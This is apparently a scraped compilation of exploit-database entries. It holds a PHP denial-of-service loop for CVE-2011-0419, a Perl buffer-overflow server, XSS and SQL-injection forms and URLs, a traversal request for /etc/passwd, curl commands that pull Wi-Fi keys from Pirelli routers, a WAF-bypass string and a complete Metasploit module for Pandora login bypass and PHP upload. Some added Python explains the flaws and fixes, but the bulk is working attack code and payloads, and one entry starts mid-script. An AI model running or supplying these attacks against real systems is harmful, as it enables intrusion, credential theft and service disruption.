$localport=80;
$localuri="/koniec/";

if(!is_writable(".")) die("!writable");

// Phase 1
// Create some filename
touch("cx".str_repeat(".",125));

// Phase 2
// Create .htaccess with
unlink("./.htaccess");
$htaccess=fopen("./.htaccess", "a");
fwrite($htaccess,"AddDescription \"CVE-2011-0419\" ".str_repeat('*.',512)."\n");
fclose($htaccess);

// Phase 3
// Local connect (bypass firewall restriction)
while(1){
    $fp = fsockopen($localhost, $localport, $errno, $errstr, 30);
    if (!$fp) echo "$errstr ($errno)<br />\n";
    else {
        $out = "GET ".$localuri."/?P=".str_repeat("*?",1500)."* HTTP/1.1\r\n";
        $out .= "Host: ".$localhost."\r\n";
        $out .= "Connection: Close\r\n\r\n";
        fwrite($fp, $out);
        fclose($fp);
    }
}
?>
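What makes the "?P=*?*?*?...*" request above expensive is the matcher, not the server: a glob matcher that recurses on every "*" tries every way of splitting the file name between the wildcards, and when the name cannot match (here 127 characters against a pattern needing 1500) it exhausts an exponential number of splits before giving up. The Python below is an added example, not apr_fnmatch() or the APR fix: a minimal recursive matcher with that behaviour beside an iterative one with identical "*" and "?" semantics (no bracket classes) that rewinds only to the most recent "*", bounding the work by pattern length times name length. The pathological case is constructed from the PoC's request shape.

```python
import time


def match_recursive(pattern, text):
    """Minimal recursive glob matcher ('*' = any run, '?' = one char, no classes).
    Every '*' tries every split and recurses, so '*?*?*?...' against a name that
    cannot match explores an exponential number of splits before failing."""
    if not pattern:
        return not text
    if pattern[0] == "*":
        return any(match_recursive(pattern[1:], text[i:]) for i in range(len(text) + 1))
    if not text or (pattern[0] != "?" and pattern[0] != text[0]):
        return False
    return match_recursive(pattern[1:], text[1:])


def match_linear(pattern, text):
    """Same semantics without recursion: on a mismatch, rewind only to the most recent
    '*' and let it absorb one more character. Work is bounded by len(pattern) * len(text)."""
    p = t = 0
    star = -1   # index of the last '*' seen in pattern, or -1
    star_t = 0  # text position up to which that '*' currently matches
    while t < len(text):
        if p < len(pattern) and (pattern[p] == "?" or pattern[p] == text[t]):
            p += 1
            t += 1
        elif p < len(pattern) and pattern[p] == "*":
            star, star_t = p, t
            p += 1
        elif star != -1:
            star_t += 1
            p, t = star + 1, star_t
        else:
            return False
    while p < len(pattern) and pattern[p] == "*":
        p += 1
    return p == len(pattern)


def pathological_case(pairs=1500, name_len=127):
    """Constructed from the PoC: '?P=*?*?...*' against a long, dot-filled file name."""
    return "*?" * pairs + "*", "cx" + "." * (name_len - 2)


def timed_match(fn, pattern, text):
    """Run one matcher and return (result, seconds)."""
    start = time.perf_counter()
    result = fn(pattern, text)
    return result, time.perf_counter() - start


if __name__ == "__main__":
    pat, name = pathological_case()
    print("linear, full case:", timed_match(match_linear, pat, name))
    # The recursive matcher only gets a much smaller non-matching case; the full one does not finish.
    small_pat, small_name = pathological_case(pairs=10, name_len=8)
    print("recursive, 10 pairs vs 8 chars:", timed_match(match_recursive, small_pat, small_name))
```

The defensive lesson generalises past this CVE: any matcher or regex engine that backtracks on user-controlled patterns needs either a non-backtracking algorithm or a hard cap on pattern length and wildcard count before it is exposed to request parameters.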
Palringo 2.8.1 - Local Stack Buffer Overflow

#!/usr/bin/perl
# Exploit Title: palringo stack buffer overflow
# Date: 10 January 2015
# Vulnerability discovered by: Mr.ALmfL9
# Vendor Homepage: http://www.palringo.com/
# Software Link: http://www.palringo.com/ar/sa/download/?get=winpc
# Version: 2.8.1
# Tested on: Windows 8.1

use IO::Socket;

$port = 8080;

my $payload = "\x41" x 144;
$payload = $payload . "\x42" x 4;
$payload = $payload . "\x42" x 9000;

$serv = IO::Socket::INET->new(Proto=>'tcp', LocalPort=>$port, Listen=>1)
    or die "Error: listen($port)\n";

while($cli=$serv->accept()){
    print "[#] port is: $port\n";
    print $cli "HTTP/$payload\r\n\r\n";
    while(<$cli>){
        print $cli;
    }
}

#*REFERENCE*
#.1=http://store2.up-00.com/2015-01/1420867197761.png
#.2=http://store2.up-00.com/2015-01/1420867235381.png
Argyle Social - Multiple Cross-Site Scripting Vulnerabilities

source: https://www.securityfocus.com/bid/47826/info

Argyle Social is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

1.
<form action="www.example.com/settings-ajax/stream_filter_rules/create" method="post" name="main">
<input type="hidden" name="stream_filter_rule" value=&#039;{"name":"rulename","id":"","flags":["flagged"],"networks":null,"user_id":"0","terms":"XSS\&quot;><script>alert(document.cookie)</script>"}&#039;>
</form>
<script>
document.main.submit();
</script>

2.
<form action="www.example.com/publish-ajax/efforts/create" method="post" name="main">
<input type="hidden" name="effort" value=&#039;{"effort_id":"","title":"ptitle2\"><font color="#0000FF"><script>alert(document.cookie)</script>","url":"http://www.google.com","short":null,"campaigns":[],"primary_campaign":null,"flights":[{"glass_id":"post0","flight_id":null,"mdk":false,"source":"web interface","content_type":"twitter-status","content":{"content":"hello"},"stime":"4/30/2011 23:10:00","networks":[{"id":"1","name":"My Name","type":"twitter","url":"","avatar":"http://a2.twimg.com/profile_images/1124040897/at-twitter_reasonably_small.png"}],"waparams":{"pname":null}}]}&#039;>
</form>
<script>
document.main.submit();
</script>
- Title: CVE-2015-0554 ADB BroadBand Pirelli ADSL2/2+ Wireless Router P.DGA4001N remote information disclosure HomeStation Movistar
- Author: Eduardo Novella @enovella_ ednolo[@]inf.upv[dot]es
- Version: Tested on firmware version PDG_TEF_SP_4.06L.6
- Shodan dork: + "Dropbear 0.46 country:es" (from now on it looks like this no longer works)
- Summary: HomeStation movistar has deployed routers manufactured by Pirelli. These routers allow their HTML pages to be fetched from any public IP address in the world. There is neither authentication nor any other protection to prevent unauthorized extraction of sensitive information.

- The vulnerability and the way to exploit it:

$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "WLAN_"
<option value='0'>WLAN_DEAD</option>

$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var wpapskkey"
var wpaPskKey = 'IsAklFHhFFui1sr9ZMqD';

$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var WscDevPin"
var WscDevPin = '12820078';

$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var sessionkey"
var sessionKey='1189641421';

$ curl -s http://${IP_ADDRESS}/wlcfg.html | grep -i "bssid:" -A 3
<td width="50">BSSID:</td>
<td> DC:0B:1A:XX:XX:XX </td>

# Rebooting the router remotely and provoking a Denial of Service
#-----------------------------------------------------------------

http://${IP_ADDRESS}/resetrouter.html

We can observe at the source:

<!-- hide
var sessionKey='846930886';
function btnReset() {
   var loc = 'rebootinfo.cgi?';
   loc += 'sessionKey=' + sessionKey;
   var code = 'location="' + loc + '"';
   eval(code);
}
// done hiding -->

http://${IP_ADDRESS}/rebootinfo.cgi?sessionKey=233665123

# All the information that we can fetch from the device.
#----------------------------------------------

webs$ ls
adslcfgadv.html diagpppoe.html ipv6lancfg.html qoscls.html statsatmreset.html
adslcfgc.html dlnacfg.html js qosqmgmt.html statsifc.html
adslcfg.html dnscfg.html jsps qosqueueadd.html statsifcreset.html
adslcfgtone.html dnsproxycfg.html lancfg2.html qsmain.html statsmocalanreset.html
algcfg.html dsladderr.html languages quicksetuperr.html statsmocareset.html
APIS dslbondingcfg.html lockerror.html quicksetup.html statsmocawanreset.html
atmdelerr.html enblbridge.html logconfig.html quicksetuptesterr.html statsvdsl.html
backupsettings.html enblservice.html logintro.html quicksetuptestsucc.html statsvdslreset.html
berrun.html engdebug.html logobkg.gif rebootinfo.html statswanreset.html
berstart.html ethadderr.html logoc.gif resetrouter.html statsxtmreset.html
berstop.html ethdelerr.html logo_corp.gif restoreinfo.html storageusraccadd.html
certadd.html footer.html logo.html routeadd.html stylemain.css
certcaimport.html hlpadslsync.html logomenu.gif rtdefaultcfgerr.html threeGPIN.html
certimport.html hlpatmetoe.html main.html rtdefaultcfg.html todadd.html
certloadsigned.html hlpatmseg.html menuBcm.js scdmz.html tr69cfg.html
cfgatm.html hlpethconn.html menu.html scinflt.html updatesettings.html
cfgeth.html hlppngdns.html menuTitle.js scmacflt.html upload.html
cfgl2tpac.html hlppnggw.html menuTree.js scmacpolicy.html uploadinfo.html
cfgmoca.html hlppppoasess.html mocacfg.html scoutflt.html upnpcfg.html
cfgptm.html hlppppoeauth.html multicast.html scprttrg.html url_add.html
colors.css hlppppoeconn.html natcfg2.html scripts util.js
config.json.txt hlppppoeip.html ntwksum2.html scvrtsrv.html wanadderr.html
css hlptstdns.html omcidownload.html seclogintro.html wancfg.html
ddnsadd.html hlpusbconn.html omcisystem.html snmpconfig.html wlcfgadv.html
defaultsettings.html hlpwlconn.html password.html sntpcfg.html wlcfg.html
dhcpinfo.html html portmapadd.html standby.html wlcfgkey.html
diag8021ag.html ifcdns.html portmapedit.html StaticIpAdd.html wlmacflt.html
diagbr.html ifcgateway.html portName.js StaticIpErr.html wlrefresh.html
diag.html images pppoe.html statsadslerr.html wlsecurity.html
diagipow.html index.html pradd.html statsadsl.html wlsetup.html
diaglan.html info.html ptmadderr.html statsadslreset.html wlwapias.html
diagmer.html ipoacfg.html ptmdelerr.html statsatmerr.html xdslcfg.html
diagpppoa.html ippcfg.html pwrmngt.html statsatm.html

+ Conclusion:
This vulnerability can be exploited remotely and it should be patched as soon as possible. An attacker could be monitoring our network or, even worse, the router could be a member of a botnet without our knowledge. A first mitigation could be either to update these routers to the latest firmware version or to install third-party firmware such as OpenWRT or DD-WRT on them.

+ References:
http://packetstormsecurity.com/files/115663/Alpha-Networks-ADSL2-2-Wireless-Router-ASL-26555-Password-Disclosure.html

+ Timeline:
2013-04-xx Send email to Movistar and Pirelli
2015-01-05 Full disclosure
EmbryoCore 1.03 - 'index.php' SQL Injection

source: https://www.securityfocus.com/bid/47763/info

EmbryoCore is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

EmbryoCore 1.03 is vulnerable; other versions may also be affected.

http://www.example.com/[path]/index.php?page=[-!Blind SQLi Here!-]
HOMEPIMA Design - 'filedown.php' Local File Disclosure

source: https://www.securityfocus.com/bid/47770/info

HOMEPIMA Design is prone to a local file-disclosure vulnerability because it fails to adequately validate user-supplied input.

Exploiting this vulnerability would allow an attacker to obtain potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks.

http://www.example.com/setup/filedown.php?file=../../../../../../../../../../../../../../etc/passwd
source: https://www.securityfocus.com/bid/47772/info

Keyfax Customer Response Management is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

Keyfax Customer Response Management 3.2.2.6 is vulnerable; other versions may also be affected.

http://www.example.com/keyfax32/test/response.asp?co="style%3d"x:expression(alert(1))""%20";
http://www.example.com/keyfax32/rs/main_rs.asp?C="style%3d"x:expression(alert(1))""%20";
HireHackking

Imperva SecureSphere - SQL Query Filter Security Bypass

source: https://www.securityfocus.com/bid/47780/info

Imperva SecureSphere is prone to a security-bypass vulnerability in its SQL query filter: a crafted SQL fragment passes the filter yet is still interpreted by the database as a valid condition.

An attacker can leverage this vulnerability to bypass the restrictions the appliance enforces. Successful exploits may allow attackers to exploit SQL-injection vulnerabilities in applications the appliance is protecting.

The following expression evades the filter:

15 and '1'=(SELECT '1' FROM dual) and '0having'='0having'
HireHackking
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Pandora v3.1 Auth Bypass and Arbitrary File Upload Vulnerability",
      'Description'    => %q{
        This module exploits an authentication bypass vulnerability in Pandora v3.1
        as disclosed by Juan Galiana Lara. It also integrates with the built-in
        pandora upload which allows a user to upload arbitrary files to the
        '/images/' directory.

        This module was created as an exercise in the Metasploit Mastery Class
        at Blackhat that was facilitated by egypt and mubix.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Juan Galiana Lara',                          # Vulnerability discovery
          'Raymond Nunez <rcnunez[at]upd.edu.ph>',      # Metasploit module
          'Elizabeth Loyola <ecloyola[at]upd.edu.ph>',  # Metasploit module
          'Fr330wn4g3 <Fr330wn4g3[at]gmail.com>',       # Metasploit module
          '_flood <freshbones[at]gmail.com>',           # Metasploit module
          'mubix <mubix[at]room362.com>',               # Auth bypass and file upload
          'egypt <egypt[at]metasploit.com>',            # Auth bypass and file upload
        ],
      'References'     =>
        [
          ['CVE', '2010-4279'],
          ['OSVDB', '69549'],
          ['BID', '45112']
        ],
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          ['Automatic Targeting', { 'auto' => true }]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Nov 30 2010",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The path to the web application', '/pandora_console/']),
      ], self.class)
  end

  def check
    base = target_uri.path

    # retrieve software version from login page
    begin
      res = send_request_cgi({
        'method' => 'GET',
        'uri'    => normalize_uri(base, 'index.php')
      })

      if res and res.code == 200
        # Tested on v3.1 Build PC100609 and PC100608
        if res.body.include?("v3.1 Build PC10060")
          return Exploit::CheckCode::Appears
        elsif res.body.include?("Pandora")
          return Exploit::CheckCode::Detected
        end
      end
      return Exploit::CheckCode::Safe
    rescue ::Rex::ConnectionError
      vprint_error("#{peer} - Connection failed")
    end

    return Exploit::CheckCode::Unknown
  end

  # upload a payload using the pandora built-in file upload
  def upload(base, file, cookies)
    data = Rex::MIME::Message.new
    data.add_part(file, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{@fname}\"")
    data.add_part("Go", nil, nil, 'form-data; name="go"')
    data.add_part("images", nil, nil, 'form-data; name="directory"')
    data.add_part("1", nil, nil, 'form-data; name="upload_file"')
    data_post = data.to_s
    data_post = data_post.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(base, 'index.php'),
      'cookie'   => cookies,
      'ctype'    => "multipart/form-data; boundary=#{data.bound}",
      'vars_get' => {
        'sec'  => 'gsetup',
        'sec2' => 'godmode/setup/file_manager',
      },
      'data'     => data_post
    })
    register_files_for_cleanup(@fname)
    return res
  end

  def exploit
    base = target_uri.path
    @fname = "#{rand_text_numeric(7)}.php"
    cookies = ""

    # bypass authentication and get session cookie
    # (loginhash_data is md5('admin'): the loginhash feature accepts it when no
    # loginhash secret has been configured on the target)
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(base, 'index.php'),
      'vars_get' => {
        'loginhash_data' => '21232f297a57a5a743894a0e4a801fc3',
        'loginhash_user' => 'admin',
        'loginhash'      => '1',
      },
    })

    # stop here on any outcome other than a logged-in page; the original
    # module fell through to the upload with an empty cookie jar
    if res and res.code == 200
      if res.body.include?("Logout")
        cookies = res.get_cookies
        print_status("Login Bypass Successful")
        print_status("cookie monster = " + cookies)
      else
        fail_with(Exploit::Failure::NotVulnerable, "Login Bypass Failed")
      end
    else
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - No usable response to the login bypass request")
    end

    # upload PHP payload to images/[fname]
    print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length} bytes)")
    php = %Q|<?php #{payload.encoded} ?>|
    begin
      res = upload(base, php, cookies)
    rescue ::Rex::ConnectionError
      fail_with(Exploit::Failure::Unreachable, "#{peer} - Connection failed")
    end

    if res and res.code == 200
      print_good("#{peer} - File uploaded successfully")
    else
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Uploading PHP payload failed")
    end

    # retrieve and execute PHP payload
    print_status("#{peer} - Executing payload (images/#{@fname})")
    begin
      res = send_request_cgi({
        'method' => 'GET',
        'uri'    => normalize_uri(base, 'images', "#{@fname}")
      }, 1)
    rescue ::Rex::ConnectionError
      fail_with(Exploit::Failure::Unreachable, "#{peer} - Connection failed")
    end
  end
end
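The module sends one fixed token, `21232f297a57a5a743894a0e4a801fc3`, which is the MD5 of the string `admin`. As an added example (Python, neither the module's nor Pandora's code) the block below reconstructs why that is enough and what the server-side checks would have to look like instead. The shape of the bypassed scheme, md5(user + configured secret) with the secret empty on an unconfigured install, is an assumption drawn from that constant; the image extension allow-list is likewise an illustration of how the second weakness the module chains (a `.php` file accepted by the `images/` upload) would be closed, not Pandora's file_manager code.

```python
import hashlib
import hmac
import os

# Copied from the module above: the loginhash parameters it sends.
MODULE_LOGINHASH_USER = "admin"
MODULE_LOGINHASH_DATA = "21232f297a57a5a743894a0e4a801fc3"


def legacy_loginhash(user, shared_secret):
    """Assumed shape of the bypassed scheme: md5(user + secret). With no secret
    configured, the token depends on the username alone and anyone can compute it."""
    return hashlib.md5((user + shared_secret).encode()).hexdigest()


def legacy_check(user, token, shared_secret):
    """Accepts the attacker's token whenever the deployment never set a secret."""
    return token == legacy_loginhash(user, shared_secret)


def hardened_loginhash(user, shared_secret):
    """Keyed MAC over the user name: without the key there is nothing to precompute."""
    return hmac.new(shared_secret.encode(), user.encode(), hashlib.sha256).hexdigest()


def hardened_check(user, token, shared_secret):
    """Refuses the feature outright until an operator configures a real secret,
    and compares in constant time."""
    if len(shared_secret) < 16:
        return False
    return hmac.compare_digest(token, hardened_loginhash(user, shared_secret))


# Illustrative allow-list for an images/ upload directory (an assumption, not
# Pandora's policy): one extension only, so 1234567.php and shell.php.png both fail.
ALLOWED_IMAGE_EXT = {"png", "jpg", "jpeg", "gif"}


def upload_name_allowed(filename):
    name = os.path.basename(filename).lower()
    parts = name.split(".")
    if len(parts) != 2:
        return False            # no extension, or a double extension
    stem, ext = parts
    return bool(stem) and ext in ALLOWED_IMAGE_EXT


if __name__ == "__main__":
    print("md5('admin') ==", legacy_loginhash("admin", ""))
    print("legacy accepts module token with empty secret:",
          legacy_check(MODULE_LOGINHASH_USER, MODULE_LOGINHASH_DATA, ""))
    print("hardened accepts module token with empty secret:",
          hardened_check(MODULE_LOGINHASH_USER, MODULE_LOGINHASH_DATA, ""))
    print("module's upload name allowed:", upload_name_allowed("1234567.php"))
```

The two fixes are independent: the keyed check stops the login bypass, and the allow-list stops the post-auth upload from becoming code execution even for a legitimately logged-in administrator.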
HireHackking
source: https://www.securityfocus.com/bid/47784/info

Apache Struts is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. Successful exploitation requires Dynamic Method Invocation (DMI) to be enabled, which it is by default in the affected versions.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Apache Struts versions 2.0.0 through 2.2.1.1 are vulnerable.

http://www.example.com/struts2-blank/home.action!login:cantLogin<script>alert(document.cookie)</script>=some_value
HireHackking

ZAPms 1.22 - 'nick' SQL Injection

source: https://www.securityfocus.com/bid/47782/info

ZAPms is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

ZAPms 1.22 is vulnerable; other versions may also be affected.

The following example request is available:

<form action="http://www.example.com/[path]/?sid=1" method="post" id="Login" >
<input name="nick" type="text" id="nick" value="'SQL+CODE+HERE" />
<input name="pwd" id="pwd" type="password" value="adminpwd" />
<input name="submit" type="submit" class="submit_login" value="Login" />
</form>
HireHackking
source: https://www.securityfocus.com/bid/47790/info

Calendarix is prone to multiple cross-site scripting vulnerabilities and an SQL-injection vulnerability because the application fails to sufficiently sanitize user-supplied input.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Calendarix 0.8.20080808 is vulnerable; other versions may also be affected.

<form action="http://www.example.com/cal_login.php?op=login" method="post" name="main" />
<input type="hidden" name="login" value="&#039;SQL_CODE_HERE"/>
<input type="hidden" name="password" value=""/>
<input type="submit" value="submit"/>
</form>

http://www.example.com/cal_login.php/%27%3E%3Cscript%3Ealert%28123%29;%3C/script%3E

<form action="http://www.example.com/cal_catview.php?catop=viewcat" method="post" name="main" />
<input type="hidden" name="gocat" value="&#039;</script><script>alert(document.cookie);</script>"/>
<input type="submit" value="submit"/>
</form>

http://www.example.com/cal_date.php?frmname=%3C/script%3E%3Cscript%3Ealert%28123%29;%3C/script%3E

http://www.example.com/cal_footer.inc.php?leftfooter=%3Cscript%3Ealert%28123%29;%3C/script%3E
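The ZAPms `nick` and Calendarix `login` forms, and the EmbryoCore `page` parameter earlier on this page, are one defect in two shapes: a request value concatenated into a WHERE clause. As an added example (Python on SQLite, none of these projects' code; the table layout, the credentials and the page ids are constructed sample data), the block below models both shapes, shows the boolean oracle an attacker uses when, as in the EmbryoCore case, the only feedback is whether a page renders, and places the parameterised queries that close both next to them:

```python
import sqlite3


def make_db():
    """Constructed sample schema: a users table behind a login form and a
    pages table behind index.php?page=<id>."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, nick TEXT, pwd TEXT)")
    con.execute("INSERT INTO users VALUES (1, 'admin', 's3cret'), (2, 'guest', 'guest')")
    con.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT)")
    con.execute("INSERT INTO pages VALUES (1, 'home'), (2, 'about')")
    return con


# --- shape 1: string context, the login forms -------------------------------

def login_vulnerable(con, nick, pwd):
    """The advisories' pattern: the form fields are spliced into the query text."""
    sql = f"SELECT nick FROM users WHERE nick = '{nick}' AND pwd = '{pwd}'"
    row = con.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(con, nick, pwd):
    """Bound parameters: the driver sends the values separately from the SQL text."""
    row = con.execute("SELECT nick FROM users WHERE nick = ? AND pwd = ?", (nick, pwd)).fetchone()
    return row[0] if row else None


# --- shape 2: numeric context, index.php?page=... ----------------------------

def page_exists_vulnerable(con, page):
    """Models a page lookup whose only observable result is render / no render;
    no quotes are needed because the value lands in a numeric comparison."""
    sql = f"SELECT title FROM pages WHERE id = {page}"
    try:
        return con.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def page_exists_safe(con, page):
    return con.execute("SELECT title FROM pages WHERE id = ?", (page,)).fetchone() is not None


def blind_extract(oracle, subquery, max_len=32):
    """Boolean-based blind extraction: one yes/no question per character position,
    each asked through a true/false oracle such as page_exists_*."""
    out = ""
    for pos in range(1, max_len + 1):
        for code in range(32, 127):
            probe = f"1 AND unicode(substr(({subquery}),{pos},1)) = {code}"
            if oracle(probe):
                out += chr(code)
                break
        else:
            break          # substr() past the end returns '', so no code matches
    return out


ADMIN_PWD_SUBQUERY = "SELECT pwd FROM users WHERE nick='admin'"


if __name__ == "__main__":
    con = make_db()
    print("login bypass (vulnerable):", login_vulnerable(con, "' OR 1=1 --", "x"))
    print("login bypass (safe):      ", login_safe(con, "' OR 1=1 --", "x"))
    print("blind extract (vulnerable):",
          blind_extract(lambda p: page_exists_vulnerable(con, p), ADMIN_PWD_SUBQUERY))
    print("blind extract (safe):      ",
          blind_extract(lambda p: page_exists_safe(con, p), ADMIN_PWD_SUBQUERY))
```

The numeric case is worth noting separately because quoting or escaping the value, the usual half-fix for the string case, does nothing for it: `page=1 AND ...` contains no quote to escape. Parameter binding handles both.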
HireHackking
source: https://www.securityfocus.com/bid/47834/info

The Microsoft .NET Framework is prone to a remote code-execution vulnerability that affects the Just-In-Time (JIT) compiler optimization on x86 architectures.

Successful exploits may allow an attacker to execute arbitrary code in the context of the browser; this may aid in further attacks.

if ((value == null || value == new string[0]) == false)